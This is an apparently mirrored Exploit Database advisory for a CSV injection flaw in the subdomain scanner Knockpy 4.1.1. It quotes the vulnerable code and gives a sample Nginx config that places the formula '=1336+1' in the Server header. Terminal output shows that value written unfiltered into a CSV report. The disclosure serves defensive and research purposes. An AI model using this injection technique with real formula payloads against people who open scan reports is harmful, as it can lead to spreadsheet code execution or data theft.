Knockpy 4.1.1 – CSV Injection

• Exploit Database
• 13 阅读

• 作者： Dolev Farhi
  日期： 2021-01-04
• 类别：

  • local
  平台：

  • Python
• 来源：https://www.exploit-db.com/exploits/49342/

• # Exploit Title: Knockpy 4.1.1 - CSV Injection
  # Author: Dolev Farhi
  # Date: 2020-12-29
  # Vendor Homepage: https://github.com/guelfoweb/knock
  # Version : 4.1.1
  # Tested on: Debian 9.13
  
  Knockpy, as part of its subdomain brute forcing flow of a remote domain, issues a HEAD request to the server to fetch details such as headers, status code, etc.
  The data then gets reflected when issuing the -c flag to store as a CSV file with the Server HTTP Response Header unfiltered.
  
  Vulnerable code segment(s)
  
  # knockpy.py
  
  # row = ip+'\t'+str(data['status'])+'\t'+'host'+'\t'+str(data['hostname'])+get_tab(data['hostname'])+str(server_type)
  # subdomain_csv_list.append(ip+','+str(data['status'])+','+'host'+','+str(data['hostname'])+','+str(server_type))
  
  # modules/save_report.py
  
  # if fields:
  #csv_report += 'ip,status,type,domain_name,server\n'
  # for item in report:
  #csv_report += item + '\n'
  # report = csv_report
  
  
  1. Example malicious Nginx config to return CSV formula headers:
  
  http {
  ...
  server_tokens off;
  more_set_headers 'Server: =1336+1';
  ...
  }
  
  2. Tester runs Knoockpy
  root@host:~/# python knockpy/knockpy.py -c test.local
  
  + checking for virustotal subdomains: SKIP
  	VirusTotal API_KEY not found
  + checking for wildcard: NO
  + checking for zonetransfer: NO
  + resolving target: YES
  - scanning for subdomain...
  
  Ip Address	Status	Type	Domain Name			Server
  ----------	------	----	-----------			------
  127.0.0.1 200 hostappserver.test.local		=1336+1
  
  
  CSV result
  
  root@host:~/# cat test_local.csv
  127.0.0.1,200,host,appserver.test.local,=1336+1
  127.0.0.1,200,host,www.test.local,=1336+1